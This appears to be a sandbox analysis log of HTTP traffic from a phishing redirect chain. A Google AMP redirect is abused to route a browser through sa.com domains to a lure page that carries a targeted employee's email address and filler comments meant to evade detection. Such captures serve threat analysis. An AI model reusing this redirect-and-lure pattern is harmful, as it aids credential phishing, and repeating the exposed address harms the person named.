                                                                                        Nov 1, 2024 13:46:02.507805109 CET264INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:02 GMT
                                                                                        Server: Apache
                                                                                        refresh: 0;url=https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.com
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Nov 1, 2024 13:46:03.012170076 CET447OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: ir.nbaikp3.sa.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Referer: http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Nov 1, 2024 13:46:03.179193974 CET515INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:03 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 315
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449736172.217.18.34435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:45:48 UTC1096OUTGET /url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1
                                                                                        Host: www.google.co.th
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:45:48 UTC1073INHTTP/1.1 302 Found
                                                                                        Location: https://www.google.co.th/amp/ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com
                                                                                        Cache-Control: private
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-7MZMXPflwh9hfe919goWlg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                        Permissions-Policy: unload=()
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Date: Fri, 01 Nov 2024 12:45:48 GMT
                                                                                        Server: gws
                                                                                        Content-Length: 313
                                                                                        X-XSS-Protection: 0
                                                                                        Set-Cookie: NID=518=FNavcWl5dt1vJ4q5ZzYroABSFK_8ybUnNjh5Eoxbg7pzW6d9Abx_sqiF0d2J4MVs3c-bXX-DOtqCS-tBElxvBp1Cc-JiaiPH0HgDLCLYJzQ0bPSTFQZJjZb7zIdOOr0YWCUUtIoqZi9oStsxpqiinbrc0aYxhHWCjOZxgAjHu7ekpssBfgZyrWGoFkLylJfe; expires=Sat, 03-May-2025 12:45:48 GMT; path=/; domain=.google.co.th; Secure; HttpOnly; SameSite=none
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-11-01 12:45:48 UTC305INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 74 68 2f 61 6d 70 2f 69 72 2e 6e 62 61 69 6b 70 33 2e 73 61 2e 63 6f 6d 2f 64 65 6c 61 77 2f 6c 61 77 6e 2f 6b 6f 6f 2f 73 66 5f 72 61 6e 64 5f 73 74 72 69 6e 67 5f 6d 69 78 65 64 28 32 34 29 2f
                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.th/amp/ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/
                                                                                        2024-11-01 12:45:48 UTC8INData Raw: 2f 48 54 4d 4c 3e 0d 0a
                                                                                        Data Ascii: /HTML>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449735172.217.18.34435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:45:48 UTC1105OUTGET /amp/ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1
                                                                                        Host: www.google.co.th
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=518=FNavcWl5dt1vJ4q5ZzYroABSFK_8ybUnNjh5Eoxbg7pzW6d9Abx_sqiF0d2J4MVs3c-bXX-DOtqCS-tBElxvBp1Cc-JiaiPH0HgDLCLYJzQ0bPSTFQZJjZb7zIdOOr0YWCUUtIoqZi9oStsxpqiinbrc0aYxhHWCjOZxgAjHu7ekpssBfgZyrWGoFkLylJfe
                                                                                        2024-11-01 12:45:49 UTC863INHTTP/1.1 302 Found
                                                                                        Location: http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com
                                                                                        Cache-Control: private
                                                                                        X-Robots-Tag: noindex
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-AfQET6ZfzRyLdfiZ31U6QA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                        Permissions-Policy: unload=()
                                                                                        Date: Fri, 01 Nov 2024 12:45:48 GMT
                                                                                        Server: gws
                                                                                        Content-Length: 291
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-11-01 12:45:49 UTC291INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 69 72 2e 6e 62 61 69 6b 70 33 2e 73 61 2e 63 6f 6d 2f 64 65 6c 61 77 2f 6c 61 77 6e 2f 6b 6f 6f 2f 73 66 5f 72 61 6e 64 5f 73 74 72 69 6e 67 5f 6d 69 78 65 64 28 32 34 29 2f 62 69 6c 6c 2e 77 61 66 66 6f 72 64 40 71 75 72 61 74 65 72 65 74
                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateret


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449741184.28.90.27443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:45:52 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-11-01 12:45:52 UTC467INHTTP/1.1 200 OK
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        Content-Type: application/octet-stream
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Server: ECAcc (lpl/EF70)
                                                                                        X-CID: 11
                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                        X-Ms-Region: prod-neu-z1
                                                                                        Cache-Control: public, max-age=100790
                                                                                        Date: Fri, 01 Nov 2024 12:45:52 GMT
                                                                                        Connection: close
                                                                                        X-CID: 2


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449742184.28.90.27443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:45:53 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        Accept-Encoding: identity
                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Range: bytes=0-2147483646
                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                        Host: fs.microsoft.com
                                                                                        2024-11-01 12:45:53 UTC515INHTTP/1.1 200 OK
                                                                                        ApiVersion: Distribute 1.1
                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                        Content-Type: application/octet-stream
                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                        Server: ECAcc (lpl/EF06)
                                                                                        X-CID: 11
                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                        X-Ms-Region: prod-weu-z1
                                                                                        Cache-Control: public, max-age=100846
                                                                                        Date: Fri, 01 Nov 2024 12:45:53 GMT
                                                                                        Content-Length: 55
                                                                                        Connection: close
                                                                                        X-CID: 2
                                                                                        2024-11-01 12:45:53 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449749188.114.97.34435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:05 UTC685OUTGET /9o93/ HTTP/1.1
                                                                                        Host: ecoutura.sa.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: http://ir.nbaikp3.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:05 UTC1015INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        set-cookie: PHPSESSID=b9tlets4pfikfq68tperuik8h3; path=/
                                                                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        cache-control: no-store, no-cache, must-revalidate
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1gSpStoFI74WSLeRgV9pF%2FwJ14VBABjE9en1SVIdgpL2Fi3DK6A8ZRtQJ9Kgjw086pX3DVacrau%2FY3cG%2F7lQeDY%2BopZcyIIqwi7uSzmEQ9JQaI72IkMc1aTxczFQkHsL6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc51fe353ac4-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1263&delivery_rate=2592658&cwnd=250&unsent_bytes=0&cid=60ee81fb574f8552&ts=1156&x=0"
                                                                                        2024-11-01 12:46:05 UTC354INData Raw: 38 33 37 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 59 6f 75 20 63 61 6e e2 80 99 74 20 62 75 79 20 68 61 70 70 69 6e 65 73 73 2c 20 62 75 74 20 79 6f 75 20 63 61 6e 20 62 75 79 20 61 20 63 61 72 20 61 6e 64 20 74 68 61 74 e2 80 99 73 20 6b 69 6e 64 20 6f 66 20 74 68 65 20 73 61 6d 65 20 74 68 69 6e 67 3a 20 45 6e 6a 6f 79 20 6c 69 66 65 e2 80 99 73 20 70 6c 65 61 73 75 72 65 73 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d
                                                                                        Data Ascii: 837<html lang="en"><head><title></title>... <p>You cant buy happiness, but you can buy a car and thats kind of the same thing: Enjoy lifes pleasures.</p> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><m
                                                                                        2024-11-01 12:46:05 UTC1369INData Raw: 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 73 6f 20 49 20 62 75 69 6c 74 20 69 74 20 6d 79 73 65 6c 66 3a 20 53 6f 6d 65 74 69 6d 65 73 2c 20 77 65 20 68 61 76 65 20 74 6f 20 63 72 65 61 74 65 20 77 68 61 74 20 77 65 20 64 65 73 69 72 65 2e 20 2d 2d 3e 0a 09 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61
                                                                                        Data Ascii: es.cloudflare.com/turnstile/v0/api.js"></script>... so I built it myself: Sometimes, we have to create what we desire. --><style>body{font-family:Arial,sans-serif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-a
                                                                                        2024-11-01 12:46:05 UTC387INData Raw: 6f 6c 6f 67 79 20 68 61 76 65 20 63 68 61 6e 67 65 64 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 49 74 20 72 65 70 72 65 73 65 6e 74 73 20 74 68 65 20 6f 70 65 6e 20 72 6f 61 64 20 61 6e 64 20 65 78 70 6c 6f 72 61 74 69 6f 6e 2e 20 2d 2d 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 46 72 75 69 74 73 20 68 65 6c 70 20 69 6e 20 6d 61 69 6e 74 61 69 6e 69 6e 67 20 68 79 64 72 61 74 69 6f 6e 20 77 69 74 68 20 74 68 65 69 72 20 68 69 67 68 20 77 61 74 65 72 20 63 6f 6e 74 65 6e 74 3a 20 54 68 65 79 20 6b 65 65 70 20 75 73 20 72 65 66 72 65 73 68 65 64 20 61 6e 64 20 68 79 64 72 61 74 65 64 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74
                                                                                        Data Ascii: ology have changed.</p> --></div></div>... It represents the open road and exploration. --></div></div>... <p>Fruits help in maintaining hydration with their high water content: They keep us refreshed and hydrated.</p> --><script>funct
                                                                                        2024-11-01 12:46:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449753104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:06 UTC543OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:06 UTC386INHTTP/1.1 302 Found
                                                                                        Date: Fri, 01 Nov 2024 12:46:06 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        location: /turnstile/v0/b/22755d9a86c9/api.js
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc58a9b44659-DFW
                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449754104.18.95.414435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:06 UTC558OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:07 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:06 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47672
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfc5d6a8e2860-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:07 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                        2024-11-01 12:46:07 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
